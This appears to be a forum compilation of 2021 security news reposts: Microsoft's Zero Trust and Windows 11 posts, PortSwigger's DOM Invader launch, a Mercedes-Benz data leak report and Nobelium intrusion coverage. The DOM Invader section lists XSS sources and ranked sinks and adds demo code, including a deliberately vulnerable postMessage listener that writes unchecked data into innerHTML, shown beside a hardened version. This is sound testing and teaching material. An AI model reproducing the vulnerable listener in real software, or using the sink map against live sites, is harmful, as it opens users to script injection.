Resources for strengthening national security in the public and private sectors

We believe President Biden’s EO is a timely call-to-action, not only for government agencies but as a model for all businesses looking to become resilient in the face of cyber threats. The heightened focus on incident response, data handling, collaboration, and implementation of Zero Trust should be a call-to-action for every organization—public and private—in the mission to better secure our global supply chain, infrastructure resources, information, and progress towards a better future.
Microsoft is committed to supporting federal agencies in answering the nation’s call to strengthen inter- and intra-agency capabilities, unlocking the government’s full cyber capabilities. Recommended next steps for federal agencies have been outlined by my colleague Jason Payne, Chief Technology Officer of Microsoft Federal. As part of this responsibility, we have provided Federal agencies with key Zero Trust Scenario Architectures mapped to NIST standards, as well as a Zero Trust Rapid Modernization Plan.

Microsoft is also committed to supporting customers in staying up to date with the latest security trends and developing the next generation of security professionals. We have developed a set of skilling resources to train teams on the capabilities identified in the EO and be ready to build a more secure, agile environment that supports every mission.

In addition to EO resources for federal government agencies, we are continuing to publish guidance, share learnings, develop resources, and invest in new capabilities to help organizations accelerate their Zero Trust adoption and meet their cybersecurity requirements. Here are our top recommended Zero Trust resources:

- For details on how Microsoft defines Zero Trust and breaks down solutions across identities, endpoints, apps, networks, infrastructure, and data, download the Zero Trust Maturity Model.
- To assess your organization’s progress in the Zero Trust journey and receive suggestions for technical next steps, use our Zero Trust Assessment tool.
- For technical guidance on deployment, integration, and development, visit our Zero Trust Guidance Center for step-by-step guidance on implementing Zero Trust principles.
- If you’d like to learn from our own Zero Trust deployment journey at Microsoft, our Chief Information Security Officer Bret Arsenault and team share their stories at Microsoft Digital Inside Track.
Tackling sophisticated cyber threats together

The EO is an opportunity for all organizations to improve cybersecurity postures and act rapidly to implement Zero Trust, including multifactor authentication and end-to-end encryption. The White House has provided clear direction on what is required, and the Zero Trust framework can also be used as a model for private sector businesses, state and local governments, and organizations around the world.

We can only win as a team against these malicious attackers and significant challenges. Every step your organization takes in advancing a Zero Trust architecture not only secures your assets but also contributes to a safer world for all. We applaud organizations of every size for embracing Zero Trust, and we stand committed to partnering with you all on this journey.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

[1] Nobelium Resource Center, Microsoft Security Response Center. 04 March 2021.
[2] President Signs Executive Order Charting New Course to Improve the Nation’s Cybersecurity and Protect Federal Government Networks, The White House, 12 May 2021.

Sursa: https://www.microsoft.com/security/blog/2021/06/30/the-critical-role-of-zero-trust-in-securing-our-world/
Introducing DOM Invader: DOM XSS just got a whole lot easier to find

Gareth Heyes | 30 June 2021 at 16:47 UTC

Of the three main types of XSS, DOM-based XSS is by far the most difficult to find and exploit. But we come bearing good news! PortSwigger just released a new tool for Burp Suite Professional and Burp Suite Community Edition that's going to make testing for DOM XSS much easier - and we think you're going to like it. Meet: DOM Invader.

We've created a YouTube video to show you how to use DOM Invader and solve an Academy lab.

Background

Most modern sites use multiple JavaScript libraries - and have many lines of complex, minified code. This makes testing for DOM XSS a real headache. PortSwigger Research has specifically developed DOM Invader to make this process much easier.

"The Augmented DOM allows you to find DOM XSS as if it were reflected XSS."

Through its Augmented DOM, DOM Invader will provide you with a convenient tree view of all of your target's sources and sinks. This greatly simplifies the task of hunting for DOM XSS, and will be big news for the bug bounty hunting and pentest communities. So, without further ado, let's take a closer look at DOM Invader and what it can do:

DOM Invader's Augmented DOM provides a convenient tree view of an application's sources and sinks.

How to get started with DOM Invader

DOM Invader is a completely new Burp Suite tool, implemented as an extension in the embedded browser. Simply update your version of Burp Suite Professional or Burp Suite Community Edition to 2021.7 on the Early Adopter channel to start using it. View the latest release notes.

By default, DOM Invader is turned off (because it alters site behavior). Turn it on by clicking the icon in the top right hand corner of Burp Suite's embedded browser.

DOM Invader lives in Burp Suite's embedded browser.
DOM Invader instruments your target's DOM, intercepting any JavaScript sources and sinks it might come across, and organizing them ready for you to play with. A "source" could be any JavaScript object that allows user-controlled input (for example: location.search), while a "sink" is any function or setter that allows JavaScript/HTML execution. One notorious example of a sink is the eval function.

"Helpfully, DOM Invader orders sinks so that the most interesting ones appear first."

With DOM Invader, we're going to be working a lot with canaries. A canary is a unique string that's used to see where your user input is reflected inside a sink. By default, DOM Invader uses a random canary, but you can customize this value to whatever you like.

How DOM Invader works

We're not going to go into a full demo of how to use DOM Invader here (please see the documentation for that), but as a broad overview, you're going to be spending a lot of your time using the tool in the Augmented DOM. The Augmented DOM will show you all the sources and sinks contained within your target, and allows you to find DOM XSS as if it were reflected XSS - by inspecting the value sent to the sink.

Essentially, you'll load up the site you want to test, and insert your canary into a query parameter or other such source. Opening DevTools in Burp Suite's embedded browser, you'll be able to click on a new "Augmented DOM" tab - which will show you any sources and sinks containing the canary value - as well as a tree view of all the sources and sinks available. Helpfully, DOM Invader orders sinks so that the most interesting ones appear first.

DOM Invader will order lists of sinks with the most interesting ones appearing first.

When you find an interesting sink, DOM Invader will allow you to see the value contained in it, as well as a stack trace. It'll even highlight your canary for you. At this point, you might like to add some extra characters to your canary in the URL parameter or another source.
You can then check the canary value in the Augmented DOM to see if those characters have been correctly encoded.

Canaries are automatically highlighted by DOM Invader.

Other useful features include the ability to search values sent to a sink, as well as automatically injecting canaries into URL parameters and form elements. View the full documentation for DOM Invader.

Web messages in DOM Invader

When testing sites, we've always found it cumbersome to test for web-message vulnerabilities. Sure, you can add event listeners and breakpoints in Chrome - but there's no easy way to edit them without going to the effort of writing some JavaScript code. PortSwigger could hardly let this situation stand! So DOM Invader is set up to help you test for web-message vulnerabilities.

"DOM Invader is capable of manipulating web messages and spoofing their origin automatically, if you so wish."

DOM Invader lets you see web messages and easily reissue them in its Postmessage tab.

Again, we won't go into full details here (please see the documentation for that), but to access this functionality, just click on DOM Invader's icon in the embedded browser, and turn on "Postmessage interception".

Through the Postmessage tab, you'll be able to see a bunch of useful information about any web messages your target sends. This includes their type (e.g. JSON string/JavaScript object), origin, actual data sent, and the location in the code where they occur (the Stack Trace). You can then click through to open a web message, where you can manipulate the data sent. You can also have DOM Invader spoof the origin of a web message, simply by clicking the "Spoof origin" check box. Pretty cool, right?

If you find a vulnerable event listener and you've successfully crafted an exploit in the data box, then you can generate a proof of concept at the touch of a button. Simply click the "Build PoC" button, and your PoC will be copied to the clipboard.
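What "a vulnerable event listener" looks like next to a hardened one, as an added example (not DOM Invader's code and not from the post): a small harness plays the role the Postmessage tab plays when you reissue a message with a spoofed origin, and reports what reached the innerHTML sink. The window object, the element and the trusted origin are constructed stand-ins so it runs in Node without a browser.

```javascript
// Added example, not DOM Invader's own code: the vulnerable and the hardened
// shape of a web-message listener, plus a harness that does what DOM Invader's
// Postmessage tab lets you do by hand: deliver a message with a chosen origin
// and see what reaches a sink. "window" and the element are constructed
// stand-ins, so this runs in Node without a browser.

const TRUSTED_ORIGIN = "https://app.example.test"; // constructed origin

function makeWindow() {
  const listeners = [];
  const element = { innerHTML: "" }; // stand-in for a DOM element (the sink)
  return {
    element,
    addEventListener(type, fn) {
      if (type === "message") listeners.push(fn);
    },
    // Deliver a MessageEvent-like object, as postMessage would.
    dispatchMessage(data, origin) {
      for (const fn of listeners) fn({ data, origin });
    },
  };
}

// Vulnerable listener: no origin check, and the message body is treated as
// HTML. Any page that can obtain a reference to this window reaches the sink.
function installVulnerableListener(win) {
  win.addEventListener("message", (e) => {
    win.element.innerHTML = e.data;
  });
}

// Hardened listener: exact origin match, a defined message schema, and the
// text escaped before it reaches the HTML sink.
function installHardenedListener(win) {
  win.addEventListener("message", (e) => {
    if (e.origin !== TRUSTED_ORIGIN) return; // reject spoofed origins
    let msg;
    try {
      msg = JSON.parse(e.data);
    } catch (err) {
      return; // not the expected shape, ignore
    }
    if (!msg || typeof msg.text !== "string") return;
    win.element.innerHTML = escapeHtml(msg.text);
  });
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Harness: install one listener, deliver a message from the given origin,
// and return whatever ended up in the sink (empty string if nothing did).
function probe(install, data, origin) {
  const win = makeWindow();
  install(win);
  win.dispatchMessage(data, origin);
  return win.element.innerHTML;
}
```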
DOM Invader is capable of manipulating web messages and spoofing their origin automatically, if you so wish.

DOM Invader also attempts to grade the severity and confidence of messages it sees based on several factors - including if the message data was found in a sink and what type of sink it was. When messages are manipulated, DOM Invader will attempt to do a follow-up with more interesting characters. If this is successful it will upgrade the severity and confidence based on the follow-up characters that were found unencoded in the sink.

List of sources and sinks

Whilst developing DOM Invader we quite naturally needed a list of sources and sinks so we decided to produce one and put it into DOM Invader. We decided to release this list and terminology as it was trivial to extract from the source anyway. This will be included in the XSS cheat sheet when it's updated - but for now the current list will be added to this post. We use the sink ranking terminology in order to decide which sink is more important than others. The lower the value, the more important the sink is.
Sources

```javascript
// Sources: JavaScript objects that can carry user-controlled input.
const sourcesList = [
  "location",
  "location.href",
  "location.hash",
  "location.search",
  "location.pathname",
  "document.URL",
  "window.name",
  "document.referrer",
  "document.documentURI",
  "document.baseURI",
  "document.cookie"
];
```

Sinks

```javascript
// Sinks: functions and setters that can execute JavaScript/HTML or otherwise
// act on input. The lower the rank, the more important the sink.
const sinkRanking = {
  "jQuery.globalEval": 1,
  "eval": 2,
  "Function": 3,
  "execScript": 4,
  "setTimeout": 5,
  "setInterval": 6,
  "setImmediate": 7,
  "msSetImmediate": 7,
  "script.src": 8,
  "script.textContent": 9,
  "script.text": 10,
  "script.innerText": 11,
  "script.innerHTML": 12,
  "script.appendChild": 13,
  "script.append": 14,
  "document.write": 15,
  "document.writeln": 16,
  "jQuery": 17,
  "jQuery.$": 18,
  "jQuery.constructor": 19,
  "jQuery.parseHTML": 20,
  "jQuery.has": 20,
  "jQuery.init": 20,
  "jQuery.index": 20,
  "jQuery.add": 20,
  "jQuery.append": 20,
  "jQuery.appendTo": 20,
  "jQuery.after": 20,
  "jQuery.insertAfter": 20,
  "jQuery.before": 20,
  "jQuery.insertBefore": 20,
  "jQuery.html": 20,
  "jQuery.prepend": 20,
  "jQuery.prependTo": 20,
  "jQuery.replaceWith": 20,
  "jQuery.replaceAll": 20,
  "jQuery.wrap": 20,
  "jQuery.wrapAll": 20,
  "jQuery.wrapInner": 20,
  "jQuery.prop.innerHTML": 20,
  "jQuery.prop.outerHTML": 20,
  "element.innerHTML": 21,
  "element.outerHTML": 22,
  "element.insertAdjacentHTML": 23,
  "iframe.srcdoc": 24,
  "location.href": 25,
  "location.replace": 26,
  "location.assign": 27,
  "location": 28,
  "window.open": 29,
  "iframe.src": 30,
  "javascriptURL": 31,
  "jQuery.attr.onclick": 32,
  "jQuery.attr.onmouseover": 32,
  "jQuery.attr.onmousedown": 32,
  "jQuery.attr.onmouseup": 32,
  "jQuery.attr.onkeydown": 32,
  "jQuery.attr.onkeypress": 32,
  "jQuery.attr.onkeyup": 32,
  "element.setAttribute.onclick": 33,
  "element.setAttribute.onmouseover": 33,
  "element.setAttribute.onmousedown": 33,
  "element.setAttribute.onmouseup": 33,
  "element.setAttribute.onkeydown": 33,
  "element.setAttribute.onkeypress": 33,
  "element.setAttribute.onkeyup": 33,
  "createContextualFragment": 34,
  "document.implementation.createHTMLDocument": 35,
  "xhr.open": 36,
  "xhr.send": 36,
  "fetch": 36,
  "fetch.body": 36,
  "xhr.setRequestHeader.name": 37,
  "xhr.setRequestHeader.value": 38,
  "jQuery.attr.href": 39,
  "jQuery.attr.src": 40,
  "jQuery.attr.data": 41,
  "jQuery.attr.action": 42,
  "jQuery.attr.formaction": 43,
  "jQuery.prop.href": 44,
  "jQuery.prop.src": 45,
  "jQuery.prop.data": 46,
  "jQuery.prop.action": 47,
  "jQuery.prop.formaction": 48,
  "form.action": 49,
  "input.formaction": 50,
  "button.formaction": 51,
  "button.value": 52,
  "element.setAttribute.href": 53,
  "element.setAttribute.src": 54,
  "element.setAttribute.data": 55,
  "element.setAttribute.action": 56,
  "element.setAttribute.formaction": 57,
  "webdatabase.executeSql": 58,
  "document.domain": 59,
  "history.pushState": 60,
  "history.replaceState": 61,
  "xhr.setRequestHeader": 62,
  "websocket": 63,
  "anchor.href": 64,
  "anchor.target": 65,
  "JSON.parse": 66,
  "document.cookie": 67,
  "localStorage.setItem.name": 68,
  "localStorage.setItem.value": 69,
  "sessionStorage.setItem.name": 70,
  "sessionStorage.setItem.value": 71,
  "element.outerText": 72,
  "element.innerText": 73,
  "element.textContent": 74,
  "element.style.cssText": 75,
  "RegExp": 76,
  "window.name": 77,
  "location.pathname": 78,
  "location.protocol": 79,
  "location.host": 80,
  "location.hostname": 81,
  "location.hash": 82,
  "location.search": 83,
  "input.value": 84,
  "input.type": 85,
  "document.evaluate": 86
};
```

Team effort

I temporarily joined the PortSwigger Scanner team whilst developing this tool and I worked with so many talented people. It was a real team effort to produce the final product. I'd like to thank James Kettle for coming up with the idea to create an extension and for helping with the initial design. James was inspired by Filedescriptor's (Cure53) similar tool. I did some refactoring with Patrick Albinson and he proved he is a Gradle god when helping get DOM Invader into Burp. Alex Craig was heavily involved in refactoring and improving DOM Invader so much and made quite brilliant suggestions to move it lightyears ahead of the initial prototype.
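To make the source, sink, canary and ranking ideas from the sections above concrete, here is an added example (not DOM Invader's code): a minimal tracer that wraps a handful of sinks, records every value carrying the canary together with the characters that follow it, and orders the findings with a subset of the sinkRanking table. The page object, the application code under test and the canary value are constructed stand-ins, so it runs in Node with no browser.

```javascript
// Added example, not DOM Invader's own code: a minimal canary tracer that
// shows the idea behind the Augmented DOM. A set of sinks is wrapped, every
// call whose argument contains the canary is recorded, and the findings are
// ordered with (a subset of) the sink ranking listed above. It runs in Node
// without a real DOM: the sinks live on a constructed "page" object that
// stands in for window, location and a DOM element.

const CANARY = "canary7f3a"; // constructed; DOM Invader generates a random one

// Subset of the sinkRanking object above (lower number = more interesting).
const SINK_RANK = {
  "eval": 2,
  "setTimeout": 5,
  "element.innerHTML": 21,
  "location.href": 25,
  "element.textContent": 74,
};

// Stand-in for the browser page (hypothetical; nothing here executes code).
function makePage() {
  const element = { _html: "", _text: "" };
  Object.defineProperty(element, "innerHTML", {
    get() { return this._html; },
    set(v) { this._html = String(v); },
    configurable: true,
  });
  Object.defineProperty(element, "textContent", {
    get() { return this._text; },
    set(v) { this._text = String(v); },
    configurable: true,
  });
  const location = { _href: "https://example.test/" };
  Object.defineProperty(location, "href", {
    get() { return this._href; },
    set(v) { this._href = String(v); },
    configurable: true,
  });
  return {
    eval: (code) => "evaluated:" + code,        // stand-in, does not evaluate
    setTimeout: (code) => "scheduled:" + code,  // stand-in, does not schedule
    element,
    location,
  };
}

// Wrap function sinks and property-setter sinks so that any value carrying
// the canary is recorded with the sink's rank and the eight characters that
// follow the canary (the post's manual check of what survived unencoded).
function instrument(page, canary) {
  const findings = [];
  const record = (sink, value) => {
    const s = String(value);
    const idx = s.indexOf(canary);
    if (idx === -1) return;
    const after = s.slice(idx + canary.length, idx + canary.length + 8);
    findings.push({ sink, rank: SINK_RANK[sink], value: s, after });
  };
  for (const name of ["eval", "setTimeout"]) {
    const original = page[name];
    page[name] = function (...args) {
      record(name, args[0]);
      return original.apply(this, args);
    };
  }
  const wrapSetter = (obj, prop, sinkName) => {
    const desc = Object.getOwnPropertyDescriptor(obj, prop);
    Object.defineProperty(obj, prop, {
      get: desc.get,
      set(v) { record(sinkName, v); desc.set.call(this, v); },
      configurable: true,
    });
  };
  wrapSetter(page.element, "innerHTML", "element.innerHTML");
  wrapSetter(page.element, "textContent", "element.textContent");
  wrapSetter(page.location, "href", "location.href");
  // Most interesting sink first, like the Augmented DOM's ordering.
  return { findings: () => findings.slice().sort((a, b) => a.rank - b.rank) };
}

// Constructed application code: copies a query parameter into several sinks,
// one of them after encoding. This is the behaviour the tracer exposes.
function runApp(page, search) {
  const name = new URLSearchParams(search).get("name") || "";
  page.element.textContent = name;                                // text sink
  page.element.innerHTML = "<b>" + name + "</b>";                 // HTML sink
  page.setTimeout("greet('" + encodeURIComponent(name) + "')");  // encoded first
  page.location.href = "https://example.test/?user=" + name;     // URL sink
}

// Run the app once with the canary in a source; return the ordered findings.
function trace(search, canary = CANARY) {
  const page = makePage();
  const monitor = instrument(page, canary);
  runApp(page, search);
  return monitor.findings();
}
```

Reading the `after` field of each finding tells you which of the extra characters reached the sink unencoded, which is the same judgement the post describes making by eye in the Augmented DOM.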
Paul Wilshaw improved the UI tremendously and made everything look pretty, especially the Postmessage features. Thanks to Nolan Ward for doing the video editing and creating the fantastic animation. Thanks to Matt Atkinson for helping with the copy editing and Nigel Evans for doing a great job with the documentation. Chris Wood really helped organizing UI sessions and finally I'd like to thank James Kettle, Michael Stepankin, Andrzej Matykiewicz and Trikster for being guinea pigs and UX testing the tool.

Eating our own dog food

Hopefully, you're now raring to go and find some DOM XSS with DOM Invader. We think there's plenty out there. In fact, we know there is, because we recently struck gold on a well-known bug bounty program while testing DOM Invader's functionality. Head over to the research channel to read up about the PayPal DOM XSS I found.

To get started with DOM Invader, download the early adopter latest version of Burp Suite Professional/Community Edition and head to the embedded browser. View the full documentation for DOM Invader.

Don't forget to follow @PortSwiggerRes on Twitter for the latest Burp Suite news and hacking exploits. That includes a writeup of the hack above.

Gareth Heyes @garethheyes

Sursa: https://portswigger.net/blog/introducing-dom-invader
28 JUN 2021 NEWS

Mercedes Benz Data Leak Includes Card and Social Security Details

Phil Muncaster, UK / EMEA News Reporter, Infosecurity Magazine

Mercedes Benz has released details of a data breach affecting customers and prospective buyers in the US.

The luxury carmaker said a vendor had informed the company on June 11 that the information was “inadvertently made accessible on a cloud storage platform.” It appears that a third-party security researcher first raised the alarm.

Although the initial investigation was set to discover whether 1.6 million unique records had been exposed, subsequent findings indicated far fewer customers and interested buyers were affected.

“The vendor reports that the personal information for these individuals (less than 1,000) is comprised mainly of self-reported credit scores as well as a very small number of driver’s license numbers, social security numbers, credit card information and dates of birth,” the statement noted. “To view the information, one would need knowledge of special software programs and tools — an internet search would not return any information contained in these files.”

These individuals entered the information in question on dealer and Mercedes-Benz websites between January 1, 2014, and June 19, 2017.

Mercedes Benz USA confirmed that none of its systems were compromised in the incident and said the issue had been mitigated by the security vendor and can’t happen again. Although it’s unlikely that threat actors managed to locate and access the information, it’s unclear how long it had been exposed for.

Mercedes-Benz USA has begun notifying those affected and said that anyone who had credit card information, driver’s license or social security numbers exposed will be offered a free 24-month subscription to a credit monitoring service.

Tom Garrubba, CISO at risk management firm Shared Assessments, welcomed the carmaker’s prompt action.
“With all the cyber-incidents that have been reported recently, it is refreshing to see that swift action taken by Mercedes Benz USA in addressing the incident with their cloud service provider and ultimately, with their customers," he added.

“The reported breach of 1000 existing and prospective customers via their cloud storage vendor’s platform should raise awareness of the importance of proper due diligence and understanding as to how your cloud service providers are protecting your data.”

Sursa: https://www.infosecurity-magazine.com/news/mercedes-benz-leak-card-social/
Windows 11 enables security by design from the chip to the cloud

David Weston, Director of Enterprise and OS Security

Over the last year, PCs have kept us connected to family, friends, and enabled businesses to continue to run. This new hybrid work paradigm has got us thinking about how we will continue to deliver the best possible quality, experience, and security for the more than 1 billion people who use Windows.

While we have adapted to working from home, it’s been rare to get through a day without reading an account of a new cybersecurity threat. Phishing, ransomware, supply chain, and IoT vulnerabilities—attackers are constantly developing new approaches to wreak digital havoc. But as attacks have increased in scope and sophistication, so have we.

Microsoft has a clear vision for how to help protect our customers now and in the future and we know our approach works. Today, we are announcing Windows 11 to raise security baselines with new hardware security requirements built-in that will give our customers the confidence that they are even more protected from the chip to the cloud on certified devices. Windows 11 is redesigned for hybrid work and security with built-in hardware-based isolation, proven encryption, and our strongest protection against malware.

Security by design: Built-in and turned on

Security by design has long been a priority at Microsoft. What other companies invest more than $1 billion a year on security and employ more than 3,500 dedicated security professionals? We’ve made significant strides in that journey to create chip-to-cloud Zero Trust out of the box. In 2019, we announced secured-core PCs that apply security best-practices to the firmware layer, or device core, that underpins Windows.
These devices combine hardware, software, and OS protections to help provide end-to-end safeguards against sophisticated and emerging threats like those against hardware and firmware that are on the rise according to the National Institute of Standards and Technology as well as the Department of Homeland Security. Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer. With Windows 11, we’re making it easier for customers to get protection from these advanced attacks out of the box.

All certified Windows 11 systems will come with a TPM 2.0 chip to help ensure customers benefit from security backed by a hardware root-of-trust. The Trusted Platform Module (TPM) is a chip that is either integrated into your PC’s motherboard or added separately into the CPU. Its purpose is to help protect encryption keys, user credentials, and other sensitive data behind a hardware barrier so that malware and attackers can’t access or tamper with that data. PCs of the future need this modern hardware root-of-trust to help protect from both common and sophisticated attacks like ransomware and more sophisticated attacks from nation-states.

Requiring the TPM 2.0 elevates the standard for hardware security by requiring that built-in root-of-trust. TPM 2.0 is a critical building block for providing security with Windows Hello and BitLocker to help customers better protect their identities and data. In addition, for many enterprise customers, TPMs help facilitate Zero Trust security by providing a secure element for attesting to the health of devices. Windows 11 also has out of the box support for Azure-based Microsoft Azure Attestation (MAA), bringing hardware-based Zero Trust to the forefront of security and allowing customers to enforce Zero Trust policies when accessing sensitive resources in the cloud with supported mobile device management (MDM) solutions like Intune, or on-premises.
Raising the security baseline to meet the evolving threat landscape. This next generation of Windows will raise the security baseline by requiring more modern CPUs, with protections like virtualization-based security (VBS), hypervisor-protected code integrity (HVCI), and Secure Boot built-in and enabled by default to protect from common malware, ransomware, and more sophisticated attacks. Windows 11 will also come with new security innovations like hardware-enforced stack protection for supported Intel and AMD hardware, helping to proactively protect our customers from zero-day exploits. Innovation like the Microsoft Pluton security processor, when used by the great partners in the Windows ecosystem, helps raise the strength of the fundamentals at the heart of robust Zero Trust security.

Ditch passwords with Windows Hello to help keep your information protected. For enterprises, Windows Hello for Business supports simplified passwordless deployment models for achieving a deploy-to-run state within a few minutes. This includes granular control of authentication methods by IT admins while securing communication between cloud tools to better protect corporate data and identity. And for consumers, new Windows 11 devices will be passwordless by default from day one.

Security and productivity in one. All these components work together in the background to help keep users safe without sacrificing quality, performance, or experience. The new set of hardware security requirements that comes with this new release of Windows is designed to build a foundation that is even stronger and more resistant to attacks on certified devices. We know this approach works—secured-core PCs are twice as resistant to malware infection.

Comprehensive security and compliance.
Out of the box support for Microsoft Azure Attestation enables Windows 11 to provide evidence of trust via attestation, which forms the basis of compliance policies organizations can depend upon to develop an understanding of their true security posture. These Azure Attestation-backed compliance policies validate both the identity, as well as the platform, and form the backbone for the Zero Trust and Conditional Access workflows for safeguarding corporate resources. This next level of hardware security is compatible with upcoming Pluton-equipped systems and also any device using the TPM 2.0 security chip, including hundreds of devices available from Acer, Asus, Dell, HP, Lenovo, Panasonic, and many others.

Windows 11 is a smarter way for everyone to collaborate, share, and present—with the confidence of hardware-backed protections.

Learn more

For more information, check out the other features that come with Windows 11:

- Windows 11 for Business
- Windows 11 for Enterprise

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Sursa: https://www.microsoft.com/security/blog/2021/06/25/windows-11-enables-security-by-design-from-the-chip-to-the-cloud/
Nobelium hackers accessed Microsoft customer support tools

By Lawrence Abrams, June 26, 2021

Microsoft says they have discovered new attacks conducted by the Russian state-sponsored Nobelium hacking group, including a hacked Microsoft support agent's computer that exposed customers' subscription information.

Nobelium is Microsoft's name for a state-sponsored hacking group believed to be operating out of Russia responsible for the SolarWinds supply-chain attacks.

In a new blog post published Friday night, Microsoft states that the hacking group has been conducting password spray and brute-force attacks to gain access to corporate networks.

Password spray and brute force attacks are similar in that they both attempt to gain unauthorized access to an online account by guessing a password. However, password spray attacks will attempt to use the same passwords across multiple accounts simultaneously to evade defenses. In contrast, brute force attacks repeatedly target a single account with different password attempts.

Microsoft says that Nobelium's recent attacks have been mostly unsuccessful. However, they know of three entities that were breached by Nobelium in these attacks.

"This activity was targeted at specific customers, primarily IT companies (57%), followed by government (20%), and smaller percentages for non-governmental organizations and think tanks, as well as financial services," Microsoft said in a blog post about the attacks. "The activity was largely focused on US interests, about 45%, followed by 10% in the UK, and smaller numbers from Germany and Canada. In all, 36 countries were targeted."

Microsoft support tools accessed by hackers

During the investigation into the attacks, Microsoft also detected an information-stealing trojan on a Microsoft customer support agent's computer that provided access to "basic account information" for a limited number of customers.
Nobelium used this customer information in targeted phishing attacks against Microsoft customers.

Microsoft reported these attacks after Reuters obtained an email sent to affected customers warning them that the threat actors gained access to information about their Microsoft Services subscriptions.

"A sophisticated Nation-State associated actor that Microsoft identifies as NOBELLIUM accessed Microsoft customer support tools to review information regarding your Microsoft Services subscriptions," read the Microsoft email obtained by Reuters.

Nobelium's recent activity

The Nobelium hacking group, also known as APT29, Cozy Bear, and The Dukes, has been attributed to the recent SolarWinds supply chain attack that compromised numerous US companies, including Microsoft, FireEye, Cisco, Malwarebytes, Mimecast, and various US government agencies.

As part of these attacks, the threat actors replaced legitimate modules in the SolarWinds Orion IT monitoring platform that were distributed to customers via the software's normal auto-update process. These malicious modules allowed the threat actors to gain remote access to compromised devices, where further internal attacks could be launched.

In April, the US government formally accused the Russian government and hackers from the Russian Foreign Intelligence Service, the SVR, of the attacks on Solarwinds and US interests.

More recently, Microsoft revealed that the hacking group compromised the Constant Contact account for USAID, a US agency responsible for providing foreign aid and development assistance. Using this marketing account, Nobelium conducted targeted phishing attacks to distribute malware and access internal networks.

USAID phishing email sent by Nobelium hackers

The US Department of Justice later seized two domains used in the phishing attacks to distribute malware.

Sursa: https://www.bleepingcomputer.com/news/microsoft/nobelium-hackers-accessed-microsoft-customer-support-tools/
https://www.agerpres.ro/economic-extern/2021/06/24/microsoft-prezinta-joi-o-noua-versiune-a-sistemului-de-operare-windows--736653?